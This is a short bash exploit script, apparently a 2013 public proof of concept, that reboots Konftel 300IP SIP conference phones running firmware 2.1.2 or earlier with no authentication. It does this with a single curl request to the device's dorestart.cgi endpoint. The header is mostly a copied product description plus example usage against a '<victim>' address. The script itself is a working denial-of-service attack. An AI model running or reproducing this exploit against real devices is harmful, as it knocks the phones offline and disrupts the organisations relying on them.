#!/bin/bash
# Konftel 300IP SIP-based Conference phone <= 2.1.2 remote bypass reboot exploit
#
# by Todor Donev / 03.2013 / Sofia,Bulgaria
# email: todor dot donev at gmail com
# type: hardware
#
# The Konftel 300IP is a flexible SIP-based conference phone,
# perfect for companies that use IP voice services. Its clear,
# natural sound comes from OmniSound HD, Konftel’s patented
# wideband audio technology. The stylishly designed
# Konftel 300IP is packed with intelligent features for more
# efficient conference calls. Record and store meetings on a
# SD memory card. Use the conference guide to call
# pre-programmed groups with just a few simple pushes of a
# button. Conveniently import and export contact details via
# the Web interface. Create your own phone book with the
# personal user profile feature. The Konftel 300IP is also
# ideal for larger conferences since it can accommodate
# expansion microphones, an external wireless headset and a
# PA system. With the Konftel 300IP your company will have
# a conference phone that combines all the benefits of IP
# voice service with innovative new features.
#
# Example usage:
# [exploits@amnesium]$ ./k300IP-rbr.sh 192.168.1.180
# Konftel 300IP SIP-based Conference phone <= 2.1.2 remote bypass reboot exploit
# Rebooting 192.168.1.180..
# Sleeping 30 secs, before rebooting
# curl: (7) couldn't connect to host
#
# Special greetings for Tsvetelina Emirska, Stilyan Angelov and all my other friends!
if [ $# != 1 ]; then
echo "usg: $0 <victim>"
exit;
fi
echo "Konftel 300IP SIP-based Conference phone <= 2.1.2 remote bypass reboot exploit"
echo "Rebooting $1.."
curl http://$1/cgi-bin/dorestart.cgi?doit=Reboot &>/dev/null
echo "Sleeping 30 secs before rebooting"
sleep 30
curl $1